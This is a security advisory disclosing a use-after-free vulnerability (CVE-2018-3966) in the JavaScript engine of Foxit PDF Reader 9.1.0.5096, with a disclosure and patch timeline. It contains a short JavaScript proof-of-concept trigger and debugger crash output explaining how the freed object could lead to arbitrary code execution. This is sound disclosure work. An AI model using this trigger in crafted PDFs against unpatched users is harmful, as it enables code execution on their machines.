CVE-2018-3966
An exploitable use-after-free vulnerability exists in the JavaScript engine of Foxit Software’s Foxit PDF Reader version 9.1.0.5096. A specially crafted PDF document can trigger a previously freed object in memory to be reused, resulting in arbitrary code execution. An attacker needs to trick the user to open the malicious file to trigger this vulnerability. If the browser plugin extension is enabled, visiting a malicious site can also trigger the vulnerability.
Foxit Software Foxit PDF Reader 9.1.0.5096.
https://www.foxitsoftware.com/products/pdf-reader/
8.0 - CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H
CWE-416: Use After Free
Foxit PDF Reader is one of the most popular PDF document readers, and has a widespread user base. It aims to have feature parity with Adobe’s Acrobat Reader. As a complete and feature-rich PDF reader, it supports JavaScript for interactive documents and dynamic forms. JavaScript support poses an additional attack surface.
When executing embedded JavaScript code, a document can be closed, which essentially frees numerous objects, but the JavaScript can continue to execute. Direct access to a now-freed object can lead to a use-after-free condition, which can be abused to execute arbitrary code. It should be noted that the closeDoc method requires higher privileges, so either the document needs to come from a trusted location, or the user must click a dialogue box that allows it to run.
This particular vulnerability lies in accessing saved reference to this.dataObjects object, which can trigger a use-after-free condition like in the following code:
function main() {
app.activeDocs[0].closeDoc();
var tmp = this;
tmp["dataObjects"].toString = f0;
}
function f0(){}
main();
In the above code, after closing the current document, a large amount of objects are freed. By modifying the toString method of this.dataObjects object, we trigger a use-after-free condition with the following crash:
(1688.e74): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=12ce6ff0 ebx=00000000 ecx=0e5a2da8 edx=0013e32c esi=12eecef0 edi=12a22f28
eip=014bdabf esp=0013e2a0 ebp=0013e2ec iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210202
FoxitReader!CryptVerifyMessageSignature+0x9620f:
014bdabf 8b01 mov eax,dword ptr [ecx] ds:0023:0e5a2da8=????????
0:000> !heap -p -a ecx
address 0e5a2da8 found in
_DPH_HEAP_ROOT @ 7581000
in free-ed allocation ( DPH_HEAP_BLOCK: VirtAddr VirtSize)
e4d2a28: e5a2000 2000
6a4b90b2 verifier!AVrfDebugPageHeapFree+0x000000c2
77d869cc ntdll!RtlDebugFreeHeap+0x0000002f
77d49e07 ntdll!RtlpFreeHeap+0x0000005d
77d163a6 ntdll!RtlFreeHeap+0x00000142
76ccc614 kernel32!HeapFree+0x00000014
028cdf1b FoxitReader!CryptVerifyMessageSignature+0x014a666b
00dc08bf FoxitReader+0x000d08bf
00dc28a8 FoxitReader+0x000d28a8
00f0965e FoxitReader+0x0021965e
00f0942b FoxitReader+0x0021942b
00f1842a FoxitReader+0x0022842a
00f02fd7 FoxitReader+0x00212fd7
0:000> u
FoxitReader!CryptVerifyMessageSignature+0x9620f:
014bdabf 8b01 mov eax,dword ptr [ecx]
014bdac1 8b10 mov edx,dword ptr [eax]
014bdac3 ffd2 call edx
An access violation happens when accessing memory pointed to by ecx which points to a free memory location. If this memory location is placed under attacker control, double dereference could lead to control over contents of edx which is used in a direct call instruction, thus leading to arbitrary code execution.
2018-07-16 - Vendor Disclosure
2018-09-28 - Vendor Patched
2018-10-01 - Public Release
Discovered by Aleksandar Nikolic of Cisco Talos.